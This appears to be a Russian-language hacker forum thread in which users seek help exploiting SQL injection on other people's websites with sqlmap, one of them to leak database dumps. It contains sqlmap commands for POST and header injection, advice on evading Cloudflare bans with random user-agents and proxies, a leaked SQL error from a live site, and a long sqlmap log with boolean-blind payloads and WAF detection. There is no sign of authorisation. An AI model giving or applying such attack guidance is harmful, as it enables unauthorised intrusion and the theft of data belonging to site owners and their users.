Предполагаю на сайте POST sql-inj и хочу проверить нмапом. Методом POST передаются следующие парметры Code: 1312312312 Content-Type: text/plain; charset="utf-8" Content-disposition: form-data; name="id" Code: 1231212 Content-Type: text/plain; charset="utf-8" Content-disposition: form-data; name="id2" Code: 3312312 Content-Type: text/plain; charset="utf-8" Content-disposition: form-data; name="id3" Как указать нмапу, чтобы он пробовал раскрутить параметр id2?
Спасибо, но при запросе: Code: sqlmap\sqlmapproject-sqlmap-67f8c22\sqlmap.py -u "http://site.com/test.php" --method=POST --data="55" '-p=id' --dbs --random-agent Мне выходит требование работать по GET несмотря на то, что я мне нужен POST запрос. Как это можно побороть? Как можно Code: [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
нашел акунетиксом слепую скулю в хедерсах, пытаюсь крутить через sqlmap командой Code: sqlmap.py -u "url" --headers="User-Agent:test*" --dbs но сервер банит примерно через 5-6 запросов (появляется 521 ошибка от клауда) пытался добавлять и time-sec и delay - не помогает. есть какие-то варианты обойти бан?
Побробуй рандомный user-agent. Еще можешь попробоват через прокси. Но скорее всего Cloud не пропустит.
сайт.ру/oc/?pg=%2527&pgpos=10&pid=%5c Как заставить мамп увидеть дырку? она крутится но мамп не видит сука по разному пытался не фига Code: SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '\'; File: /var/www/html/us_production/affiliate/include/Affiliate/Scripts/Bl/ClickRegistrator.class.php; Line: 439</span></center><br><center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1; SQL:SELECT merchant_service_image_path FROM cms_merchant_service_details WHERE merchant_service_id = '
Здравствуйте, решил заняться сливом дампов, выбрал сайт для тренировки, акушей просканил и вот что получилось. Spoiler: Скрин Хочу раскрутить уязвимость с помощью sqlmap, что прописывать в sqlmap? Вставлять ссылку с SQL injection? Вот что в ссылке Spoiler: Скрин Перевел с джавы, получилось: "По запросу </strong> не найдено мест в матрице" Я думаю написать в sqlmap: Code: slqmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3 Правильно или нет, и надо что-то добавить?
Нет, не правильно. sqlmap -u site --data='Тут То что передаётся ПОСТ методом' для этого вам надо нажать на place_name->variant 1 там будет все необходимые параметы
у тебя 2 ошибки 1. Там пост метод надо описать уязвимый пареметр который находится в POST, --data="Тут пост параметр" 2. Ты не дописал --dbs 3. (совет) В случае акуши лучше чекни Blind SQL injection, sqlmamp такое быстро взламывает (лично у меня так)
Подскажите, как бороться? Пытаюсь получить таблицы - выдает 406 ошибку Code: sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66 --dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database -- tables ___ __H__ ___ ___[)]_____ ___ ___ {1.2.4.2#dev} |_ -| . [)] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 01:56:40 [01:56:40] [INFO] parsing HTTP request from '1.txt' [01:56:40] [DEBUG] not a valid WebScarab log data [01:56:40] [DEBUG] cleaning up configuration parameters [01:56:40] [DEBUG] loading WAF script '360' [01:56:40] [DEBUG] loading WAF script 'airlock' [01:56:40] [DEBUG] loading WAF script 'anquanbao' [01:56:40] [DEBUG] loading WAF script 'armor' [01:56:40] [DEBUG] loading WAF script 'asm' [01:56:40] [DEBUG] loading WAF script 'aws' [01:56:40] [DEBUG] loading WAF script 'baidu' [01:56:40] [DEBUG] loading WAF script 'barracuda' [01:56:40] [DEBUG] loading WAF script 'bigip' [01:56:40] [DEBUG] loading WAF script 'binarysec' [01:56:40] [DEBUG] loading WAF script 'blockdos' [01:56:40] [DEBUG] loading WAF script 'ciscoacexml' [01:56:40] [DEBUG] loading WAF script 'cloudflare' [01:56:40] [DEBUG] loading WAF script 'cloudfront' [01:56:40] [DEBUG] loading WAF script 'comodo' [01:56:40] [DEBUG] loading WAF script 'datapower' [01:56:40] [DEBUG] loading WAF script 'denyall' [01:56:40] [DEBUG] loading WAF script 'dosarrest' [01:56:40] [DEBUG] loading WAF script 'dotdefender' [01:56:40] [DEBUG] loading WAF script 'edgecast' [01:56:40] [DEBUG] loading WAF script 'expressionengine' [01:56:40] [DEBUG] loading WAF script 'fortiweb' [01:56:40] [DEBUG] loading WAF script 'generic' [01:56:40] [DEBUG] loading WAF script 'hyperguard' [01:56:40] [DEBUG] loading WAF script 'incapsula' [01:56:40] [DEBUG] loading WAF script 'isaserver' [01:56:40] [DEBUG] loading WAF script 'jiasule' [01:56:40] [DEBUG] loading WAF script 'knownsec' [01:56:40] [DEBUG] loading WAF script 'kona' [01:56:40] [DEBUG] loading WAF script 'modsecurity' [01:56:40] [DEBUG] loading WAF script 'naxsi' [01:56:40] [DEBUG] loading WAF script 'netcontinuum' [01:56:40] [DEBUG] loading WAF script 'netscaler' [01:56:40] [DEBUG] loading WAF script 'newdefend' [01:56:40] [DEBUG] loading WAF script 'nsfocus' [01:56:40] [DEBUG] loading WAF script 'paloalto' [01:56:40] [DEBUG] loading WAF script 'profense' [01:56:40] [DEBUG] loading WAF script 'proventia' [01:56:40] [DEBUG] loading WAF script 'radware' [01:56:40] [DEBUG] loading WAF script 'requestvalidationmode' [01:56:40] [DEBUG] loading WAF script 'safe3' [01:56:40] [DEBUG] loading WAF script 'safedog' [01:56:40] [DEBUG] loading WAF script 'secureiis' [01:56:40] [DEBUG] loading WAF script 'senginx' [01:56:40] [DEBUG] loading WAF script 'sitelock' [01:56:40] [DEBUG] loading WAF script 'sonicwall' [01:56:40] [DEBUG] loading WAF script 'sophos' [01:56:40] [DEBUG] loading WAF script 'stingray' [01:56:40] [DEBUG] loading WAF script 'sucuri' [01:56:40] [DEBUG] loading WAF script 'tencent' [01:56:40] [DEBUG] loading WAF script 'teros' [01:56:40] [DEBUG] loading WAF script 'trafficshield' [01:56:40] [DEBUG] loading WAF script 'urlscan' [01:56:40] [DEBUG] loading WAF script 'uspses' [01:56:40] [DEBUG] loading WAF script 'varnish' [01:56:40] [DEBUG] loading WAF script 'wallarm' [01:56:40] [DEBUG] loading WAF script 'watchguard' [01:56:40] [DEBUG] loading WAF script 'webappsecure' [01:56:40] [DEBUG] loading WAF script 'webknight' [01:56:40] [DEBUG] loading WAF script 'wordfence' [01:56:40] [DEBUG] loading WAF script 'yundun' [01:56:40] [DEBUG] loading WAF script 'yunsuo' [01:56:40] [DEBUG] loading WAF script 'zenedge' [01:56:40] [DEBUG] setting the HTTP timeout [01:56:40] [DEBUG] creating HTTP requests opener object [01:56:40] [DEBUG] forcing back-end DBMS to user defined value custom injection marker ('*') found in option '--data'. Do you want to process i t? [Y/n/q] y [01:56:41] [DEBUG] resolving hostname 'url' [01:56:41] [INFO] testing connection to the target URL [01:56:41] [DEBUG] declared web page charset 'utf-8' [01:56:41] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS [01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection [01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewal l (360)' [01:56:41] [DEBUG] declared web page charset 'iso-8859-1' [01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable) [01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable) [01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable) [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application F irewall (Anquanbao)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Def ense)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manage r (F5 Networks)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web App lication Firewall (Amazon)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Fi rewall (Baidu)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application F irewall (Barracuda Networks)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security Manager (F5 Networks)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application F irewall (BinarySEC)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisc o Systems)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application Firewall (CloudFlare)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Fire wall (Comodo)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IB M)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Fi rewall (DenyAll)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Intern et Security)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Tech nologies)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab) ' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Fi rewall (Fortinet)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application Firewall (art of defence)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application F irewall (Incapsula/Imperva)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Fir ewall (Jiasule)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Ak amai Technologies)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source We b Application Firewall (Trustwave)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Applicatio n Firewall (NetContinuum/Barracuda Networks)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application F irewall (Newdefend)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Fir ewall (NSFOCUS)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Al to Networks)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Fi rewall (Armorlogic)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application S ecurity (IBM)' [01:56:42] [DEBUG] page not found (404) [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMo de (Microsoft)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firew all' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Fir ewall (Safedog)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Securi ty (BeyondTrust)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporatio n)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application Firewall (SiteLock)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos) ' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewa ll (Riverbed / Brocade)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall (Sucuri)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Applicati on Firewall (Tencent Cloud Computing)' [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Fi rewall Enterprise (Teros/Citrix Systems)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks) ' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (Un ited Security Providers)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Fir ewall (Wallarm)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Tech nologies)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firew all (AQTRONIX)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Fire wall (Yundun)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Fire wall (Yunsuo)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Fir ewall (Zenedge)' [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)' [01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)' [01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\art em\appdata\local\temp\sqlmapuumtkb12408\sqlmapresponse-opc2v1'. If you know the details on used protection please report it along with specific response to 'dev @sqlmap.org' are you sure that you want to continue with further target testing? [y/N] y [01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper') sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw Vector: AND [INFERENCE] --- [01:56:44] [INFO] testing MySQL [01:56:44] [DEBUG] resuming configuration option 'code' (200) [01:56:44] [INFO] confirming MySQL [01:56:44] [INFO] the back-end DBMS is MySQL [01:56:44] [INFO] fetching banner [01:56:44] [INFO] resumed: 5.6.39-cll-lve [01:56:44] [DEBUG] performed 0 queries in 0.00 seconds web application technology: Apache, PHP 7.1.14 back-end DBMS: MySQL >= 5.0.0 banner: '5.6.39-cll-lve' [01:56:44] [INFO] fetching tables for database: 'database' [01:56:44] [INFO] fetching number of tables for database 'database' [01:56:44] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>51 AND 'tjzX'='tjzX [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable) [01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid ation step in similar cases [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>48 AND 'tjzX'='tjzX [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable) [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>9 AND 'tjzX'='tjzX [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable) [01:56:44] [INFO] retrieved: [01:56:44] [DEBUG] performed 3 queries in 0.51 seconds [01:56:44] [WARNING] unable to retrieve the number of tables for database 'database' [01:56:44] [ERROR] unable to retrieve the table names for any database do you want to use common table existence check? [y/N/q] n No tables found [01:56:46] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times [01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF) [01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlma p\output\url'
